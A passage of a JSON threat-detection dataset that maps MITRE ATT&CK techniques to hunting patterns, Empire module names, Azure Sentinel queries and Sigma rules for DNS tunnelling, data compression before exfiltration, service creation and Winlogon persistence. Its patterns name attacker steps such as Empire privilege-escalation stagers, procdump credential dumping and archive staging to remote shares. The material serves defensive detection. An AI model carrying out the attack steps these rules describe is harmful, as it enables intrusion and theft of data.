"https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.emc.com/collateral/white-papers/h12756-wp-shell-crew.pdf", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1043", + "command_list": [ + "!=powershell.exe", + "nslookup", + "!=cmd.exe", + "powershell/lateral_movement/invoke_sshcommand" + ], + "commands": [ + { + "command": "!=powershell.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "nslookup", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "!=cmd.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell/lateral_movement/invoke_sshcommand", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100051", + "os": "windows", + "parent_process": "!=powershell.exe", + "commandline_string": "", + "sub_process_1": "nslookup", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "commonly_used_port", + "mitre_attack": "T1043", + "itw_sample": "" + }, + { + "chain_id": "100052", + "os": "windows", + "parent_process": "!=cmd.exe", + "commandline_string": "", + "sub_process_1": "nslookup", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "commonly_used_port", + "mitre_attack": "T1043", + "itw_sample": "" + }, + { + "Empire Module": "powershell/lateral_movement/invoke_sshcommand", + "ATT&CK Technique #1": "T1043", + "ATT&CK Technique #2": "", + "Technique": "Commonly Used Port", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_sshcommand\": [\"T1043\"]," + } + ], + "queries": [], + "possible_detections": [ + { + "title": "Possible DNS Tunneling", + "id": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", + "status": "experimental", + "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", + "references": [ + "https://zeltser.com/c2-dns-tunneling/", + "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/" + ], + "author": "Patrick Bareiss", + "date": "2019/04/07", + "logsource": { + "product": "dns" + }, + "detection": { + "selection": { + "parent_domain": "*" + }, + "condition": "selection | count(dns_query) by parent_domain > 1000" + }, + "falsepositives": [ + "Valid software, which uses dns for transferring data" + ], + "level": "high", + "tags": [ + "attack.t1043" + ] + }, + { + "title": "Suspicious Typical Malware Back Connect Ports", + "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "status": "experimental", + "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", + "references": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo" + ], + "author": "Florian Roth", + "date": "2017/03/19", + "tags": [ + "attack.command_and_control", + "attack.t1043" + ], + "logsource": { + "product": "windows", + "service": "sysmon", + "definition": "Use the following config to generate the necessary Event ID 10 Process Access events: VBE7.DLLUNKNOWN" + }, + "detection": { + "selection": { + "EventID": 3, + "Initiated": "true", + "DestinationPort": [ + "4443", + "2448", + "8143", + "1777", + "1443", + "243", + "65535", + "13506", + "3360", + "200", + "198", + "49180", + "13507", + "6625", + "4444", + "4438", + "1904", + "13505", + "13504", + "12102", + "9631", + "5445", + "2443", + "777", + "13394", + "13145", + "12103", + "5552", + "3939", + "3675", + "666", + "473", + "5649", + "4455", + "4433", + "1817", + "100", + "65520", + "1960", + "1515", + "743", + "700", + "14154", + "14103", + "14102", + "12322", + "10101", + "7210", + "4040", + "9943" + ] + }, + "filter1": { + "Image": "*\\Program Files*" + }, + "filter2": { + "DestinationIp": [ + "10.*", + "192.168.*", + "172.16.*", + "172.17.*", + "172.18.*", + "172.19.*", + "172.20.*", + "172.21.*", + "172.22.*", + "172.23.*", + "172.24.*", + "172.25.*", + "172.26.*", + "172.27.*", + "172.28.*", + "172.29.*", + "172.30.*", + "172.31.*", + "127.*" + ], + "DestinationIsIpv6": "false" + }, + "condition": "selection and not ( filter1 or filter2 )" + }, + "falsepositives": [ + "unknown" + ], + "level": "medium" + }, + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "4688", + "Process Execution" + ], + [ + "Packet capture" + ], + [ + "Netflow/Enclave netflow" + ], + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://securelist.com/operation-daybreak/75100/", + "https://securingtomorrow.mcafee.com/wp-content/uploads/2011/02/McAfee_NightDragon_wp_draft_to_customersv1-1.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + "https://www.anomali.com/blog/evasive-maneuvers-the-wekby-group-attempts-to-evade-analysis-via-custom-rop", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", NaN + ] + }, + { + "technique_id": "T1002", + "command_list": [ + "rar.exe", + "powershell/management/zipfolder" + ], + "commands": [ + { + "command": "rar.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell/management/zipfolder", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100067", + "os": "windows", + "parent_process": "rar.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "data_compressed", + "mitre_attack": "T1002", + "itw_sample": "" + }, + { + "Empire Module": "powershell/management/zipfolder", + "ATT&CK Technique #1": "T1002", + "ATT&CK Technique #2": "", + "Technique": "Data Compressed", + "Concatenate for Python Dictionary": "\"powershell/management/zipfolder\": [\"T1002\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"powershell.exe\"and process_command_line contains \"-Recurse | Compress-Archive\")or (process_path contains \"rar.exe\"and process_command_line contains \"rar*a*\")", + "name": "Data Compressed" + } + ], + "possible_detections": [ + { + "title": "Judgement Panda Exfil Activity", + "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", + "description": "Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike", + "references": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "author": "Florian Roth", + "date": "2019/02/21", + "tags": [ + "attack.lateral_movement", + "attack.g0010", + "attack.credential_access", + "attack.t1098", + "attack.exfiltration", + "attack.t1002" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": [ + "*\\ldifde.exe -f -n *", + "*\\7za.exe a 1.7z *", + "* eprod.ldf", + "*\\aaaa\\procdump64.exe*", + "*\\aaaa\\netsess.exe*", + "*\\aaaa\\7za.exe*", + "*copy .\\1.7z \\\\*", + "*copy \\\\client\\c$\\aaaa\\\\*" + ] + }, + "selection2": { + "Image": "C:\\Users\\Public\\7za.exe" + }, + "condition": "selection1 or selection2" + }, + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Data Compressed", + "id": "a3b5e3e9-1b49-4119-8b8e-0344a01f21ee", + "status": "experimental", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml" + ], + "logsource": { + "product": "linux", + "service": "auditd" + }, + "detection": { + "selection1": { + "type": "execve", + "a0": "zip" + }, + "selection2": { + "type": "execve", + "a0": "gzip", + "a1": "-f" + }, + "selection3": { + "type": "execve", + "a0": "tar", + "a1|contains": "-c" + }, + "condition": "1 of them" + }, + "falsepositives": [ + "Legitimate use of archiving tools by legitimate user" + ], + "level": "low", + "tags": [ + "attack.exfiltration", + "attack.t1002" + ] + }, + { + "title": "Data Compressed", + "id": "6dc5d284-69ea-42cf-9311-fb1c3932a69a", + "status": "experimental", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml" + ], + "logsource": { + "product": "windows", + "service": "powershell", + "description": "Script block logging must be enabled" + }, + "detection": { + "selection": { + "EventID": 4104, + "keywords|contains|all": [ + "-Recurse", + "|", + "Compress-Archive" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "highly likely if archive ops are done via PS" + ], + "level": "low", + "tags": [ + "attack.exfiltration", + "attack.t1002" + ] + }, + { + "title": "Data Compressed", + "id": "6f3e2987-db24-4c78-a860-b4f4095a7095", + "status": "experimental", + "description": "An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1002/T1002.yaml" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\rar.exe", + "CommandLine|contains|all": [ + " a ", + "-r" + ] + }, + "condition": "selection" + }, + "fields": [ + "Image", + "CommandLine", + "User", + "LogonGuid", + "Hashes", + "ParentProcessGuid", + "ParentCommandLine" + ], + "falsepositives": [ + "highly likely if rar is default archiver in the monitored environment" + ], + "level": "low", + "tags": [ + "attack.exfiltration", + "attack.t1002" + ] + }, + { + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "status": "experimental", + "description": "Detects suspicious command line arguments of common data compression tools", + "references": [ + "https://twitter.com/SBousseaden/status/1184067445612535811" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020", + "attack.t1002" + ], + "author": "Florian Roth, Samir Bousseaden", + "date": "2019/10/15", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "OriginalFileName": [ + "7z*.exe", + "*rar.exe", + "*Command*Line*RAR*" + ], + "CommandLine": [ + "* -p*", + "* -ta*", + "* -tb*", + "* -sdel*", + "* -dw*", + "* -hp*" + ] + }, + "falsepositive": { + "ParentImage": "C:\\Program*" + }, + "condition": "selection and not falsepositive" + }, + "falsepositives": [ + "unknown" + ], + "level": "high" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File Monitoring" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "IDS/IPS" + ], + [ + "DLP" + ], + [ + "Binary file metadata" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4663", + "File Monitoring" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "IDS/IPS" + ], + [ + "DLP" + ], + [ + "LOG-MD B9", + "Binary file metadata" + ] + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf" + ] + }, + { + "technique_id": "T1031", + "command_list": [ + "sc.exe" + ], + "commands": [ + { + "command": "sc.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + } + ], + "parsed_datasets": [ + { + "chain_id": "100073", + "os": "windows", + "parent_process": "sc.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "sc", + "mitre_attack": "T1031", + "itw_sample": "" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"sc.exe\"or process_path contains \"powershell.exe\"or process_path contains \"cmd.exe\")and process_command_line contains \"*sc*config*binpath*\"", + "name": "Modify Existing Service" + } + ], + "possible_detections": [ + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "7040", + "Service Change" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "7040/7045", + "Service Change" + ] + ], + "external_reference": [ + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf" + ] + }, + { + "technique_id": "T1004", + "command_list": [ + "winlogon.exe", + "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" + ], + "commands": [ + { + "command": "winlogon.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell", + "source": "SysmonHunter - Winlogon Helper DLL", + "name": "" + } + ], + "parsed_datasets": [ + { + "chain_id": "100087", + "os": "windows", + "parent_process": "winlogon.exe", + "commandline_string": "", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "winlogon", + "mitre_attack": "T1004", + "itw_sample": "" + }, + { + "name": "Winlogon Helper DLL", + "description": null, + "level": "medium", + "phase": "Persistence", + "query": [ + { + "type": "reg", + "reg": { + "path": { + "pattern": "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" + } + } + }, + { + "type": "process", + "process": { + "cmdline": { + "pattern": "\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit|\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where (EventID == 12 or EventID == 13 or EventID == 14) and(registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\user_nameinit\\\\\"or registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\\\\\"or registry_key_path contains \"\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\\")", + "name": "Win Logon Helper DLL" + } + ], + "possible_detections": [ + { + "title": "Winlogon Helper DLL", + "id": "851c506b-6b7c-4ce2-8802-c703009d03c0", + "status": "experimental", + "description": "Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\\Software[Wow6432Node]Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ and HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.", + "author": "Timur Zinniatullin, oscd.community", + "date": "2019/10/21", + "modified": "2019/11/04", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1004/T1004.yaml" + ], + "logsource": { + "product": "windows", + "service": "powershell", + "description": "Script block logging must be enabled" + }, + "detection": { + "selection": { + "EventID": 4104 + }, + "keyword1": [ + "*Set-ItemProperty*", + "*New-Item*" + ], + "keyword2": [ + "*CurrentVersion\\Winlogon*" + ], + "condition": "selection and ( keyword1 and keyword2 )" + }, + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "tags": [ + "attack.persistence", + "attack.t1004" + ] + }, + [ + "4688", + "Process Execution" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD", + "Hash Compare" + ], + [ + "AutoRuns" + ], + [ + "4688", + "Process Execution" + ], + [ + "LOG-MD", + "AutoRuns" + ], + [ + "4657", + "Windows Registry" + ], + [ + "4663", + "File monitoring" + ], + [ + "LOG-MD", + "Hash Compare" + ] + ], + "external_reference": [ + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf" + ] + }, + { + "technique_id": "T1050", + "command_list": [ + "*.exe (query|add)", + "\\AppData\\*", + "HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "$Recycle.bin\\*", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "Temp\\*", + "Users\\Public\\*", + "Users\\Default\\*", + "HKEY_USERS\\*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "powershell/privesc/powerup/service_exe_restore", + "powershell/privesc/powerup/service_exe_stager", + "powershell/privesc/powerup/service_exe_useradd", + "powershell/privesc/powerup/service_stager" + ], + "commands": [ + { + "command": "*.exe (query|add)", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "\\AppData\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "$Recycle.bin\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "Temp\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "Users\\Public\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "Users\\Default\\*", + "source": "Threat Hunting Tables", + "name": "file_path" + }, + { + "command": "HKEY_USERS\\*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "source": "Threat Hunting Tables", + "name": "registry_path" + }, + { + "command": "powershell/privesc/powerup/service_exe_restore", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/service_exe_stager", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/service_exe_useradd", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/privesc/powerup/service_stager", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100109", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "\\AppData\\*", + "file_value": "", + "frequency": "high", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100110", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "$Recycle.bin\\*", + "file_value": "", + "frequency": "rare", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100111", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "Temp\\*", + "file_value": "", + "frequency": "high", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100112", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "Users\\Public\\*", + "file_value": "", + "frequency": "high", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100113", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\*", + "registry_value": "", + "file_path": "Users\\Default\\*", + "file_value": "", + "frequency": "high", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "" + }, + { + "chain_id": "100114", + "os": "windows", + "parent_process": "*.exe", + "commandline_string": "(query|add)", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "HKEY_USERS\\*\\Classes\\exefile\\shell\\runas\\command\\isolatedCommand", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "new_service", + "mitre_attack": "T1050", + "itw_sample": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe" + }, + { + "Empire Module": "powershell/privesc/powerup/service_exe_restore", + "ATT&CK Technique #1": "T1050", + "ATT&CK Technique #2": "", + "Technique": "New Service", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_exe_restore\": [\"T1050\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/service_exe_stager", + "ATT&CK Technique #1": "T1050", + "ATT&CK Technique #2": "", + "Technique": "New Service", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_exe_stager\": [\"T1050\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/service_exe_useradd", + "ATT&CK Technique #1": "T1050", + "ATT&CK Technique #2": "", + "Technique": "New Service", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_exe_useradd\": [\"T1050\"]," + }, + { + "Empire Module": "powershell/privesc/powerup/service_stager", + "ATT&CK Technique #1": "T1050", + "ATT&CK Technique #2": "", + "Technique": "New Service", + "Concatenate for Python Dictionary": "\"powershell/privesc/powerup/service_stager\": [\"T1050\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"sc.exe\"or process_path contains \"powershell.exe\"or process_path contains \"cmd.exe\")and (process_command_line contains \"*New-Service*BinaryPathName*\"or process_command_line contains \"*sc*create*binpath*\"or process_command_line contains \"*Get-WmiObject*Win32_Service*create*\")", + "name": "New Service Process" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "APT29 Google Update Service Install", + "id": "c069f460-2b87-4010-8dcf-e45bab362624", + "description": "This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe so the service names and executable locations used by APT29 are specific enough to be detected in log files.", + "references": [ + "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html" + ], + "tags": [ + "attack.persistence", + "attack.g0016", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "service_install": { + "EventID": 7045, + "ServiceName": "Google Update" + }, + "timeframe": "5m", + "condition": "service_install | near process" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "process": { + "Image": [ + "C:\\Program Files(x86)\\Google\\GoogleService.exe", + "C:\\Program Files(x86)\\Google\\GoogleUpdate.exe" + ] + } + } + }, + { + "title": "Turla Service Install", + "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", + "references": [ + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/" + ], + "tags": [ + "attack.persistence", + "attack.g0010", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045, + "ServiceName": [ + "srservice", + "ipvpn", + "hkmsvc" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "StoneDrill Service Install", + "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", + "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", + "author": "Florian Roth", + "references": [ + "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/" + ], + "tags": [ + "attack.persistence", + "attack.g0064", + "attack.t1050" + ], + "logsource": { + "product": "windows", + "service": "system" + }, + "detection": { + "selection": { + "EventID": 7045, + "ServiceName": "NtsSrv", + "ServiceFileName": "* LocalService" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unlikely" + ], + "level": "high" + }, + { + "title": "Turla PNG Dropper Service", + "id": "1228f8e2-7e79-4dea-b0ad-c91f1d5016c1", + "description": "This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018", + "references": [ + 